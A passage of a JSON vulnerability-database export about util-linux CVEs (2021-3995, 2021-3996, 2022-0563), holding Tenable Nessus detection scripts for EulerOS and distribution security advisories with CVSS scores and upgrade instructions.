if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libblkid / libblkid-debuginfo / libblkid-devel / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T14:53:27", "description": "According to the versions of the util-linux package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an 'INPUTRC' environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\n - A logical error was found in util-linux's libmount library in a function that allows unprivileged users to unmount FUSE filesystems. Incorrect uid checking allows unprivileged users to unmount FUSE filesystems with similar uid users, an attacker could exploit this vulnerability to cause a denial of (CVE-2021-3995)\n\n - that allows unprivileged users to unmount FUSE filesystems. Issues related to parsing the /proc/self/mountinfo file allow unprivileged users to unmount other users' filesystems that are themselves world-writable (such as /tmp) or mounted in a world-writable directory. An attacker could exploit this (CVE-2021-3996)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-07-15T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.10.1 : util-linux (EulerOS-SA-2022-2069)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-10-17T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:util-linux", "cpe:/o:huawei:euleros:uvp:2.10.1"], "id": "EULEROS_SA-2022-2069.NASL", "href": "https://www.tenable.com/plugins/nessus/163219", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163219);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/17\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"EulerOS Virtualization 2.10.1 : util-linux (EulerOS-SA-2022-2069)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux package installed, the EulerOS Virtualization installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an 'INPUTRC' environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\n - A logical error was found in util-linux's libmount library in a function that allows unprivileged users to\n unmount FUSE filesystems. Incorrect uid checking allows unprivileged users to unmount FUSE filesystems\n with similar uid users, an attacker could exploit this vulnerability to cause a denial of (CVE-2021-3995)\n\n - that allows unprivileged users to unmount FUSE filesystems. Issues related to parsing the\n /proc/self/mountinfo file allow unprivileged users to unmount other users' filesystems that are themselves\n world-writable (such as /tmp) or mounted in a world-writable directory. An attacker could exploit this\n (CVE-2021-3996)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-2069\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf922d33\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.10.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.10.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.10.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"util-linux-2.35.2-2.h24.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-19T14:58:22", "description": "According to the versions of the util-linux package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an 'INPUTRC' environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\n - A logical error was found in util-linux's libmount library in a function that allows unprivileged users to unmount FUSE filesystems. Incorrect uid checking allows unprivileged users to unmount FUSE filesystems with similar uid users, an attacker could exploit this vulnerability to cause a denial of (CVE-2021-3995)\n\n - that allows unprivileged users to unmount FUSE filesystems. Issues related to parsing the /proc/self/mountinfo file allow unprivileged users to unmount other users' filesystems that are themselves world-writable (such as /tmp) or mounted in a world-writable directory. An attacker could exploit this (CVE-2021-3996)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-07-15T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.10.0 : util-linux (EulerOS-SA-2022-2041)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-10-18T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:util-linux", "cpe:/o:huawei:euleros:uvp:2.10.0"], "id": "EULEROS_SA-2022-2041.NASL", "href": "https://www.tenable.com/plugins/nessus/163197", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163197);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/18\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"EulerOS Virtualization 2.10.0 : util-linux (EulerOS-SA-2022-2041)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux package installed, the EulerOS Virtualization installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an 'INPUTRC' environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\n - A logical error was found in util-linux's libmount library in a function that allows unprivileged users to\n unmount FUSE filesystems. Incorrect uid checking allows unprivileged users to unmount FUSE filesystems\n with similar uid users, an attacker could exploit this vulnerability to cause a denial of (CVE-2021-3995)\n\n - that allows unprivileged users to unmount FUSE filesystems. Issues related to parsing the\n /proc/self/mountinfo file allow unprivileged users to unmount other users' filesystems that are themselves\n world-writable (such as /tmp) or mounted in a world-writable directory. An attacker could exploit this\n (CVE-2021-3996)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-2041\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?469fad5d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.10.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.10.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.10.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"util-linux-2.35.2-2.h24.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2022-08-29T22:05:00", "description": "An update that solves two vulnerabilities, contains two\n features and has two fixes is now available.\n\nDescription:\n\n This security update for libeconf, shadow and util-linux fix the following\n issues:\n\n libeconf:\n\n - Add libeconf to SLE-Module-Basesystem_15-SP3 because needed by\n 'util-linux' and 'shadow' to fix autoyast handling of security related\n parameters (bsc#1192954, jsc#SLE-23384, jsc#SLE-23402)\n\n Issues fixed in libeconf:\n - Reading numbers with different bases (e.g. oktal) (bsc#1193632) (#157)\n - Fixed different issues while writing string values to file.\n - Writing comments to file too.\n - Fixed crash while merging values.\n - Added econftool cat option (#146)\n - new API call: econf_readDirsHistory (showing ALL locations)\n - new API call: econf_getPath (absolute path of the configuration file)\n - Man pages libeconf.3 and econftool.8.\n - Handling multiline strings.\n - Added libeconf_ext which returns more information like line_nr,\n comments, path of the configuration file,...\n - Econftool, an command line interface for handling configuration files.\n - Generating HTML API documentation with doxygen.\n - Improving error handling and semantic file check.\n - Joining entries with the same key to one single entry if env variable\n ECONF_JOIN_SAME_ENTRIES has been set.\n\n shadow:\n\n - The legacy code does not support /etc/login.defs.d used by YaST. Enable\n libeconf to read it (bsc#1192954, jsc#SLE-23384, jsc#SLE-23402)\n\n util-linux:\n\n - The legacy code does not support /etc/login.defs.d used by YaST. Enable\n libeconf to read it (bsc#1192954, jsc#SLE-23384, jsc#SLE-23402)\n - Allow use of larger values for start sector to prevent `blockdev\n --report` aborting (bsc#1188507)\n - Fixed `blockdev --report` using non-space characters as a field\n separator (bsc#1188507)\n - CVE-2021-3995: Fixed unauthorized unmount in util-linux's libmount.\n (bsc#1194976)\n - CVE-2021-3996: Fixed unauthorized unmount in util-linux's libmount.\n (bsc#1194976)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2022-727=1", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-04T00:00:00", "type": "suse", "title": "Security update for libeconf, shadow and util-linux (moderate)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-03-04T00:00:00", "id": "OPENSUSE-SU-2022:0727-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/GUBUSLRBG42MLRL65HHMLIWQIKS3SKKP/", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2023-12-02T16:02:16", "description": "The util-linux package contains a large variety of low-level system utilities that are necessary for a Linux system to function. Among others, Util-linux contains the fdisk configuration tool and the login program. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-05T01:22:21", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: util-linux-2.37.3-1.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-02-05T01:22:21", "id": "FEDORA:71F07304C271", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/SW73IARDAP7WWQ6ETYQB2OS2SLW4XTT3/", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2023-12-01T18:56:58", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5055-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 24, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : util-linux\nCVE ID : CVE-2021-3995 CVE-2021-3996\n\nThe Qualys Research Labs discovered two vulnerabilities in util-linux&#x27;s\nlibmount. These flaws allow an unprivileged user to unmount other users&#x27;\nfilesystems that are either world-writable themselves or mounted in a\nworld-writable directory (CVE-2021-3996), or to unmount FUSE filesystems\nthat belong to certain other users (CVE-2021-3995).\n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 2.36.1-8+deb11u1.\n\nWe recommend that you upgrade your util-linux packages.\n\nFor the detailed security status of util-linux please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/util-linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-24T11:31:30", "type": "debian", "title": "[SECURITY] [DSA 5055-1] util-linux security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-01-24T11:31:30", "id": "DEBIAN:DSA-5055-1:E8123", "href": "https://lists.debian.org/debian-security-announce/2022/msg00021.html", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "redos": [{"lastseen": "2023-12-02T16:31:42", "description": "A vulnerability in the standard util-linux command line utility package is related to incorrect parsing of the /proc/self/mountinfo file in libmount.\r\n parsing of the /proc/self/mountinfo file in libmount. Exploitation of the vulnerability could allow an attacker to,\r\n unmount other users' filesystems that are either writable or\r\n mounted in a writable directory\n\nA vulnerability in the standard util-linux command line utility package is related to an incorrect\r\n UID checking in libmount. Exploitation of the vulnerability could allow an attacker to unmount the file systems of FUSE users with similar UIDs.\r\n FUSE file systems of users with a similar UID", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-28T00:00:00", "type": "redos", "title": "ROS-20220128-03", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-01-28T00:00:00", "id": "ROS-20220128-03", "href": "https://redos.red-soft.ru/support/secure/uyazvimosti/uyazvimost-util-linux-cve-2021-3996-cve-2021-3995/", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2023-12-02T18:48:52", "description": "## Releases\n\n * Ubuntu 21.10 \n * Ubuntu 20.04 LTS\n\n## Packages\n\n * util-linux \\- miscellaneous system utilities\n\nIt was discovered that util-linux incorrectly handled unmounting FUSE \nfilesystems. A local attacker could possibly use this issue to unmount \nFUSE filesystems belonging to other users.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-09T00:00:00", "type": "ubuntu", "title": "util-linux vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-02-09T00:00:00", "id": "USN-5279-1", "href": "https://ubuntu.com/security/notices/USN-5279-1", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "mageia": [{"lastseen": "2023-12-02T16:53:33", "description": "An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments. (CVE-2021-37600) Unauthorized unmount of FUSE filesystems belonging to users with similar uid. (CVE-2021-3995) Unauthorized unmount of filesystems in libmount (CVE-2021-3996) A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an \"INPUTRC\" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563) Additional bug fixes included by updating to version 2.36.2. See release notes for details. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-02-22T20:15:16", "type": "mageia", "title": "Updated util-linux packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37600", "CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2022-02-22T20:15:16", "id": "MGASA-2022-0076", "href": "https://advisories.mageia.org/MGASA-2022-0076.html", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "photon": [{"lastseen": "2022-05-12T18:53:15", "description": "Updates of ['rust', 'polkit', 'util-linux'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-27T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-0147", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-4034", "CVE-2022-21658"], "modified": "2022-01-27T00:00:00", "id": "PHSA-2022-0147", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-147", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T17:50:12", "description": "Updates of ['polkit', 'util-linux', 'rust'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-01-27T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-4.0-0147", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-4034", "CVE-2022-21658", "CVE-2023-34060"], "modified": "2022-01-27T00:00:00", "id": "PHSA-2022-4.0-0147", "href": 